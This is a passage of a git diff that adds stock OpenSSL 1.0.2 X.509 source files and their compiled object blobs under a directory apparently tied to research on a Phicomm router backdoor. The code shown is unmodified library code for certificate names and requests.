zW9xg2;XJ>+%5bj#yA0=gUZI0fC};;xf13;5NVuy1T1L<H?_oGUM}3*$JboWzIFI+I
z8GbwHD&u#Q;k69^CByl;pC??^|071v^`BP;LZP62cpkW&;X&w=`e1Iyg7iotag>P#
z@pAY{ybD1nh;zSMfC@rU@$Vr}0FSftD&H^mF`V!F-(Wb;^Ail`_7AZ6*1`Bv|J4j{
zVE9Icn+)$^_#F)QK^+TDo2D+>(ryx$-=&&FZ;rl)+Fw_2`Ca5$1()AH{zJj#_m4>h
zm)}3+_Xeqt{QgnS-e<8-e*cj7;FA7vtU#$z=;im1h=R-S9~%{1e*f5|;PN}fDFv6`
z3GiPLu}FR7_W+-Q%kKfp6<mG~Fcn;W59m~I`90tn1()~!mlRyy`<wK>jNSN?_x^(l
zF7NT5QE+)*KdIpIzJ58yk(4j*+424xi^S!9`bGtp_vV&@%lq+16kOhee^<ffefKj8
zF7LbXUYzSA@4L0CfuSC&Z4*4Lxby6kwRo(%t;&iG!nL-zJgwR^FrZb%`>=uJfvSL3
z)!x_B16P$=Rd1gatAc;E`MkJ?ruLTJL{)#huOBY{hJY0X#ya6z74Pl-B*h0(&_(IB
zGb^)}YAMPSvV+`NHnoLNL(|k|5vQ_dvGaVK@;M%-ke6OhG`vH=avl5-C-*=|l%Fc&
zN?aZPbI^e@|5$$93sENC3GgDvr{it5OO7v}wa|lg+_QQ4Ptt!G2ca(c<TK2$JW|}8
z3KYpFyVgPlUx_hJ@(S_$^1z(^CHx>%P^QZ7BmPt5_mW<&pKNzSrO^7HztN$nriH=v
zp9Me3FW0}&*vR?6^YJg-m*V80;PDY%N##eG>e>UO)#4=^6nPKjv~u>BZQP3s@mJzu
O4$4mFk^QUM|Nj67Pc*my

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_obj.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_obj.c
new file mode 100644
index 0000000..d317f3a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_obj.c
@@ -0,0 +1,212 @@
+/* crypto/x509/x509_obj.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/buffer.h>
+
+char *X509_NAME_oneline(X509_NAME *a, char *buf, int len)
+{
+    X509_NAME_ENTRY *ne;
+    int i;
+    int n, lold, l, l1, l2, num, j, type;
+    const char *s;
+    char *p;
+    unsigned char *q;
+    BUF_MEM *b = NULL;
+    static const char hex[17] = "0123456789ABCDEF";
+    int gs_doit[4];
+    char tmp_buf[80];
+#ifdef CHARSET_EBCDIC
+    char ebcdic_buf[1024];
+#endif
+
+    if (buf == NULL) {
+        if ((b = BUF_MEM_new()) == NULL)
+            goto err;
+        if (!BUF_MEM_grow(b, 200))
+            goto err;
+        b->data[0] = '\0';
+        len = 200;
+    }
+    if (a == NULL) {
+        if (b) {
+            buf = b->data;
+            OPENSSL_free(b);
+        }
+        strncpy(buf, "NO X509_NAME", len);
+        buf[len - 1] = '\0';
+        return buf;
+    }
+
+    len--;                      /* space for '\0' */
+    l = 0;
+    for (i = 0; i < sk_X509_NAME_ENTRY_num(a->entries); i++) {
+        ne = sk_X509_NAME_ENTRY_value(a->entries, i);
+        n = OBJ_obj2nid(ne->object);
+        if ((n == NID_undef) || ((s = OBJ_nid2sn(n)) == NULL)) {
+            i2t_ASN1_OBJECT(tmp_buf, sizeof(tmp_buf), ne->object);
+            s = tmp_buf;
+        }
+        l1 = strlen(s);
+
+        type = ne->value->type;
+        num = ne->value->length;
+        q = ne->value->data;
+#ifdef CHARSET_EBCDIC
+        if (type == V_ASN1_GENERALSTRING ||
+            type == V_ASN1_VISIBLESTRING ||
+            type == V_ASN1_PRINTABLESTRING ||
+            type == V_ASN1_TELETEXSTRING ||
+            type == V_ASN1_VISIBLESTRING || type == V_ASN1_IA5STRING) {
+            ascii2ebcdic(ebcdic_buf, q, (num > sizeof ebcdic_buf)
+                         ? sizeof ebcdic_buf : num);
+            q = ebcdic_buf;
+        }
+#endif
+
+        if ((type == V_ASN1_GENERALSTRING) && ((num % 4) == 0)) {
+            gs_doit[0] = gs_doit[1] = gs_doit[2] = gs_doit[3] = 0;
+            for (j = 0; j < num; j++)
+                if (q[j] != 0)
+                    gs_doit[j & 3] = 1;
+
+            if (gs_doit[0] | gs_doit[1] | gs_doit[2])
+                gs_doit[0] = gs_doit[1] = gs_doit[2] = gs_doit[3] = 1;
+            else {
+                gs_doit[0] = gs_doit[1] = gs_doit[2] = 0;
+                gs_doit[3] = 1;
+            }
+        } else
+            gs_doit[0] = gs_doit[1] = gs_doit[2] = gs_doit[3] = 1;
+
+        for (l2 = j = 0; j < num; j++) {
+            if (!gs_doit[j & 3])
+                continue;
+            l2++;
+#ifndef CHARSET_EBCDIC
+            if ((q[j] < ' ') || (q[j] > '~'))
+                l2 += 3;
+#else
+            if ((os_toascii[q[j]] < os_toascii[' ']) ||
+                (os_toascii[q[j]] > os_toascii['~']))
+                l2 += 3;
+#endif
+        }
+
+        lold = l;
+        l += 1 + l1 + 1 + l2;
+        if (b != NULL) {
+            if (!BUF_MEM_grow(b, l + 1))
+                goto err;
+            p = &(b->data[lold]);
+        } else if (l > len) {
+            break;
+        } else
+            p = &(buf[lold]);
+        *(p++) = '/';
+        memcpy(p, s, (unsigned int)l1);
+        p += l1;
+        *(p++) = '=';
+
+#ifndef CHARSET_EBCDIC          /* q was assigned above already. */
+        q = ne->value->data;
+#endif
+
+        for (j = 0; j < num; j++) {
+            if (!gs_doit[j & 3])
+                continue;
+#ifndef CHARSET_EBCDIC
+            n = q[j];
+            if ((n < ' ') || (n > '~')) {
+                *(p++) = '\\';
+                *(p++) = 'x';
+                *(p++) = hex[(n >> 4) & 0x0f];
+                *(p++) = hex[n & 0x0f];
+            } else
+                *(p++) = n;
+#else
+            n = os_toascii[q[j]];
+            if ((n < os_toascii[' ']) || (n > os_toascii['~'])) {
+                *(p++) = '\\';
+                *(p++) = 'x';
+                *(p++) = hex[(n >> 4) & 0x0f];
+                *(p++) = hex[n & 0x0f];
+            } else
+                *(p++) = q[j];
+#endif
+        }
+        *p = '\0';
+    }
+    if (b != NULL) {
+        p = b->data;
+        OPENSSL_free(b);
+    } else
+        p = buf;
+    if (i == 0)
+        *p = '\0';
+    return (p);
+ err:
+    X509err(X509_F_X509_NAME_ONELINE, ERR_R_MALLOC_FAILURE);
+    if (b != NULL)
+        BUF_MEM_free(b);
+    return (NULL);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_obj.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_obj.o
new file mode 100644
index 0000000000000000000000000000000000000000..557ef05728cfed171a8864061dec55d42fab81fa
GIT binary patch
literal 3528
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
DrcQlm

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_r2x.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_r2x.c
new file mode 100644
index 0000000..0ff439c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_r2x.c
@@ -0,0 +1,113 @@
+/* crypto/x509/x509_r2x.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/evp.h>
+#include <openssl/asn1.h>
+#include <openssl/x509.h>
+#include <openssl/objects.h>
+#include <openssl/buffer.h>
+
+X509 *X509_REQ_to_X509(X509_REQ *r, int days, EVP_PKEY *pkey)
+{
+    X509 *ret = NULL;
+    X509_CINF *xi = NULL;
+    X509_NAME *xn;
+
+    if ((ret = X509_new()) == NULL) {
+        X509err(X509_F_X509_REQ_TO_X509, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /* duplicate the request */
+    xi = ret->cert_info;
+
+    if (sk_X509_ATTRIBUTE_num(r->req_info->attributes) != 0) {
+        if ((xi->version = M_ASN1_INTEGER_new()) == NULL)
+            goto err;
+        if (!ASN1_INTEGER_set(xi->version, 2))
+            goto err;
+/*-     xi->extensions=ri->attributes; <- bad, should not ever be done
+        ri->attributes=NULL; */
+    }
+
+    xn = X509_REQ_get_subject_name(r);
+    if (X509_set_subject_name(ret, X509_NAME_dup(xn)) == 0)
+        goto err;
+    if (X509_set_issuer_name(ret, X509_NAME_dup(xn)) == 0)
+        goto err;
+
+    if (X509_gmtime_adj(xi->validity->notBefore, 0) == NULL)
+        goto err;
+    if (X509_gmtime_adj(xi->validity->notAfter, (long)60 * 60 * 24 * days) ==
+        NULL)
+        goto err;
+
+    X509_set_pubkey(ret, X509_REQ_get_pubkey(r));
+
+    if (!X509_sign(ret, pkey, EVP_md5()))
+        goto err;
+    if (0) {
+ err:
+        X509_free(ret);
+        ret = NULL;
+    }
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_r2x.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_r2x.o
new file mode 100644
index 0000000000000000000000000000000000000000..a5f8f9bc2286d0b3600ac1d8d3529a1d9df90991
GIT binary patch
literal 2752
zcmb`I-D@0G6u|Fh(<GX7vevI+wakN*_>p0@wU`u<olR$VR>rN_Y-;_8m)*@YNz>U~
z<^wkhy5I+l>(`^=AK+^d1o5E_S`;4zeeXj-i(g0}6tTo}?#xYY#+euKz}b7w@1Aq+
zojZ5Wysn$2p-hHw$&e?>p2sO6{n0(Uz{~<UNG8bE<k7#hXSK81VkP)dt1lYCt%YD~
z{$~uS1Xqo>HvOY|el!2wml}}Euforjarj{YH@*kU9H_=XC&r+sG6)$DA}|L%*$j3V
zGlQRu;2S=z-1r#F4Dm9RV8jT%g{3Cn>;t>JI{~FW|D~H)#CxtXD9QP4V=%+YLbg{z
zWVE)7we9|V26r^JJNK{={1M+u<p0ig_Z9PC#c^=;{B`C&ZwA+1Skhk9mb8~N`ZX!f
z&7G2`7Mp(C^W|CPgrZL8ANQG?f9<%csE<7qVloU5k^?;eTCOe<c&1HcSx}U_!hvL7
zsgX=CmpL*qI`$#FI1~8&(cCn?$dZ)%V5le^em`53<oAYkY3khrnxwuxa$1^sV{}d`
zWXCen%xOv0q$!Ai$fA@hN@G!tv;j*GlRtNo=Cg@62=~r+zdtL>o_0S&FH1)L4H*|M
zqY#lL$-B<7QxpQhoB%x}?30}pum?c#+~aZrKoWl<g+G<T=TkUM;eHB#Cxw5K!Y`%p
z%@qDa3csGhe@)@rDV+39s<YHN-cwrS9GW$Ko_ZaMHlbznOi?rGnNn#%uhY6#G<6z=
zwXK(lUaQfr?@`NfIu3EyY1_BM*{b%mPM7^|=((0hUB7w3YI(HXuq~o3RP%J9UaM5g
z)Z6G<6ss{<sn+$fUZaq*m%HY=zU73eY>z9pw`N<kv3wy6!ac9RB3-|^Zf)!(M!tUb
z8EP+|jQHA0JG9O_mPHQ3xuD>G8vEhjJE6=X1VN5>l=CV=5ab6zId38aK`w!EZX*Oi
zJ_*WsA8Zulc%M1Pj*5c(4p7cNMF<kF|5=C`KLj?9zbf!M1%54s|0ZzkX}r!&f!{6g
zTLQmF;N#ekKyaV;g7P}|2^`Oya~W(D{8pguisEkAUZY7A*K@*gm0ON=v7vZY&m+om
z!)p+w>AFN|b!^*e18a9YOMzZJ?Rt&YdgQOPeWmMkx|ZW@5QSB+R_S>MujBtAG8Dl_
zjCaZcFcjX`LNAQvHjYO?@yrUKqV({?1JaMq?{=`!<Q<mZ-(wMvcXm6<gXw(|$B)7+
z*8H#edC0|@DyS%Y{YOLyHea8QrvxU3e#8Srm=KG79=}HW?hyDqUj|zgetw)a!N8^B
z`CmlqukyfXjOQ-_PkMhhqYJ^`6TUyp<@uZ^t&K~`(T2`NBlf7<67rG7-yI;*!%d;Y
X&N1e)UXzrci$3ue!z#PK@%(=PnGl@h

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_req.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_req.c
new file mode 100644
index 0000000..bc6e566
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_req.c
@@ -0,0 +1,326 @@
+/* crypto/x509/x509_req.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/evp.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/objects.h>
+#include <openssl/buffer.h>
+#include <openssl/pem.h>
+
+X509_REQ *X509_to_X509_REQ(X509 *x, EVP_PKEY *pkey, const EVP_MD *md)
+{
+    X509_REQ *ret;
+    X509_REQ_INFO *ri;
+    int i;
+    EVP_PKEY *pktmp;
+
+    ret = X509_REQ_new();
+    if (ret == NULL) {
+        X509err(X509_F_X509_TO_X509_REQ, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    ri = ret->req_info;
+
+    ri->version->length = 1;
+    ri->version->data = (unsigned char *)OPENSSL_malloc(1);
+    if (ri->version->data == NULL)
+        goto err;
+    ri->version->data[0] = 0;   /* version == 0 */
+
+    if (!X509_REQ_set_subject_name(ret, X509_get_subject_name(x)))
+        goto err;
+
+    pktmp = X509_get_pubkey(x);
+    i = X509_REQ_set_pubkey(ret, pktmp);
+    EVP_PKEY_free(pktmp);
+    if (!i)
+        goto err;
+
+    if (pkey != NULL) {
+        if (!X509_REQ_sign(ret, pkey, md))
+            goto err;
+    }
+    return (ret);
+ err:
+    X509_REQ_free(ret);
+    return (NULL);
+}
+
+EVP_PKEY *X509_REQ_get_pubkey(X509_REQ *req)
+{
+    if ((req == NULL) || (req->req_info == NULL))
+        return (NULL);
+    return (X509_PUBKEY_get(req->req_info->pubkey));
+}
+
+int X509_REQ_check_private_key(X509_REQ *x, EVP_PKEY *k)
+{
+    EVP_PKEY *xk = NULL;
+    int ok = 0;
+
+    xk = X509_REQ_get_pubkey(x);
+    switch (EVP_PKEY_cmp(xk, k)) {
+    case 1:
+        ok = 1;
+        break;
+    case 0:
+        X509err(X509_F_X509_REQ_CHECK_PRIVATE_KEY,
+                X509_R_KEY_VALUES_MISMATCH);
+        break;
+    case -1:
+        X509err(X509_F_X509_REQ_CHECK_PRIVATE_KEY, X509_R_KEY_TYPE_MISMATCH);
+        break;
+    case -2:
+#ifndef OPENSSL_NO_EC
+        if (k->type == EVP_PKEY_EC) {
+            X509err(X509_F_X509_REQ_CHECK_PRIVATE_KEY, ERR_R_EC_LIB);
+            break;
+        }
+#endif
+#ifndef OPENSSL_NO_DH
+        if (k->type == EVP_PKEY_DH) {
+            /* No idea */
+            X509err(X509_F_X509_REQ_CHECK_PRIVATE_KEY,
+                    X509_R_CANT_CHECK_DH_KEY);
+            break;
+        }
+#endif
+        X509err(X509_F_X509_REQ_CHECK_PRIVATE_KEY, X509_R_UNKNOWN_KEY_TYPE);
+    }
+
+    EVP_PKEY_free(xk);
+    return (ok);
+}
+
+/*
+ * It seems several organisations had the same idea of including a list of
+ * extensions in a certificate request. There are at least two OIDs that are
+ * used and there may be more: so the list is configurable.
+ */
+
+static int ext_nid_list[] = { NID_ext_req, NID_ms_ext_req, NID_undef };
+
+static int *ext_nids = ext_nid_list;
+
+int X509_REQ_extension_nid(int req_nid)
+{
+    int i, nid;
+    for (i = 0;; i++) {
+        nid = ext_nids[i];
+        if (nid == NID_undef)
+            return 0;
+        else if (req_nid == nid)
+            return 1;
+    }
+}
+
+int *X509_REQ_get_extension_nids(void)
+{
+    return ext_nids;
+}
+
+void X509_REQ_set_extension_nids(int *nids)
+{
+    ext_nids = nids;
+}
+
+STACK_OF(X509_EXTENSION) *X509_REQ_get_extensions(X509_REQ *req)
+{
+    X509_ATTRIBUTE *attr;
+    ASN1_TYPE *ext = NULL;
+    int idx, *pnid;
+    const unsigned char *p;
+
+    if ((req == NULL) || (req->req_info == NULL) || !ext_nids)
+        return (NULL);
+    for (pnid = ext_nids; *pnid != NID_undef; pnid++) {
+        idx = X509_REQ_get_attr_by_NID(req, *pnid, -1);
+        if (idx == -1)
+            continue;
+        attr = X509_REQ_get_attr(req, idx);
+        if (attr->single)
+            ext = attr->value.single;
+        else if (sk_ASN1_TYPE_num(attr->value.set))
+            ext = sk_ASN1_TYPE_value(attr->value.set, 0);
+        break;
+    }
+    if (!ext || (ext->type != V_ASN1_SEQUENCE))
+        return NULL;
+    p = ext->value.sequence->data;
+    return (STACK_OF(X509_EXTENSION) *)
+        ASN1_item_d2i(NULL, &p, ext->value.sequence->length,
+                      ASN1_ITEM_rptr(X509_EXTENSIONS));
+}
+
+/*
+ * Add a STACK_OF extensions to a certificate request: allow alternative OIDs
+ * in case we want to create a non standard one.
+ */
+
